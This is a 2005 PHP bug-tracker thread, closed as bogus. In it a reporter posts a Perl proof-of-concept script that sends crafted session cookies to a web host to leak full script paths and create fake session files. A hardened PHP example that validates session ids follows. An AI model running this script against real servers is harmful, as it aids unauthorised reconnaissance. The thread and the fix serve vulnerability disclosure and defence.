ID: 35429
Updated by: [EMAIL PROTECTED]
Reported By: sienicki dot kamil at gmail dot com
-Status: Open
+Status: Bogus
Bug Type: Unknown/Other Function
Operating System: Linux/Windows (all?)
PHP Version: 4.4.1
New Comment:

Yeah, you can see the full path to the script in 99.99999% of error messages. No bug here.


Previous Comments:
------------------------------------------------------------------------

[2005-11-27 23:46:32] sienicki dot kamil at gmail dot com

I think it is a small bug: when I send '@' as a cookie name session and display_errors is on, PHP shows the full path to the script..

------------------------------------------------------------------------

[2005-11-27 21:29:22] [EMAIL PROTECTED]

What exactly are you trying to exploit?

------------------------------------------------------------------------

[2005-11-27 21:22:21] sienicki dot kamil at gmail dot com

Description:
------------
I wrote a simple exploit to show this vuln.. (I think..) A problem with sessions..

--
#!/usr/bin/perl
#
# PHP vulnerabilities..
#
# Exploit (Proof Of Concept ?) by Kamil 'K3' Sienicki
#
# I found two possibilities of using that bug.. (maybe more)
#
# display_errors must be On
#

use IO::Socket;

if (@ARGV < 3) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print "    by Kamil 'K3' Sienicki\n\n";
    print "1. Create fake session file (sess_fake) in directory (default /tmp). \n";
    print "2. Full path disclosure.\n\n";
    print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or 2)]\n\n";
    exit;
}

# Plain TCP connection to port 80 of the given host.
$socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => "$ARGV[0]",
    PeerPort => "80"
) || die "[-] Connect failed! \r\n";

if ($ARGV[2] == 1) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print "    by Kamil 'K3' Sienicki\n\n";
    print "Name of session (default PHPSESSID): ";
    $sess = <STDIN>;
    print "Name of fake sess_file: ";
    $fake = <STDIN>;
    chomp($sess, $fake);
    # Send the chosen value as the session id cookie.
    print $socket "GET $ARGV[1] HTTP/1.0\n";
    print $socket "Cookie: $sess=$fake\n\n";
    print "'$fake' fake file was created.. \n";
}
elsif ($ARGV[2] == 2) {
    print "\n";
    print "PHP Exploit (POC)\n";
    print "    by Kamil 'K3' Sienicki\n\n";
    print "Name of session (default PHPSESSID): ";
    $sess = <STDIN>;
    chomp($sess);
    print $socket "GET $ARGV[1] HTTP/1.0\n";
    # Cookie value reconstructed from the reporter's comment (a single '@');
    # the mailing-list archive replaced it with "[EMAIL PROTECTED]".
    print $socket "Cookie: $sess=@\n\n";
    # Print only the Warning lines from the response.
    while ($answer = <$socket>) {
        if ($answer =~ m/^...Warning/) {
            print $answer . "\n";
        }
    }
}
--

Reproduce code:
---------------
<?
session_start();
?>

Expected result:
----------------
Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /htdocs/sess.php on line 3

Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0

Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0

Full path disclosure..

------------------------------------------------------------------------


--
Edit this bug report at http://bugs.php.net/?id=35429&edit=1
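From the defender's side, the thread's point is that the leaked path is a consequence of display_errors being on, and that session_start() only emits the warning because it is handed a session id containing characters outside a-z, A-Z and 0-9. The following is an added example, not code from the bug report or from PHP itself: a hardened version of the reporter's sess.php that sends diagnostics to the log instead of the client and validates the session cookie before session_start() is called. The helper name valid_session_id, the 128-character length cap and the use of the default cookie name via session_name() are this example's own choices.

```php
<?php
// Added example (not from the bug report): hardened sess.php.
// Assumes the default "files" session handler and the default session name.

// Never print diagnostics to the browser; log them instead. This alone keeps
// the "in /htdocs/sess.php on line 3" part of any warning off the page.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// The warning on this page lists a-z, A-Z and 0-9 as the only valid
// characters, so accept exactly that set. The 1..128 length bound is an
// assumption of this example, not a PHP limit.
function valid_session_id($id)
{
    return is_string($id) && preg_match('/^[a-zA-Z0-9]{1,128}$/', $id) === 1;
}

$name = session_name();   // "PHPSESSID" unless session.name was changed

if (isset($_COOKIE[$name]) && !valid_session_id($_COOKIE[$name])) {
    // Drop the malformed cookie before the session module sees it, and tell
    // the client to discard it. session_start() will then issue a fresh id
    // instead of raising "The session id contains invalid characters".
    unset($_COOKIE[$name]);
    setcookie($name, '', time() - 3600);
}

session_start();
?>
```

session_start() takes the incoming id from $_COOKIE, so removing the entry first means the rejected value is never used to build a file name under session.save_path; the "Failed to write session data (files)" warning from the report therefore does not occur either. Turning display_errors off is the setting that matters for path disclosure in general, since, as the maintainer notes, almost every PHP error message includes the script path.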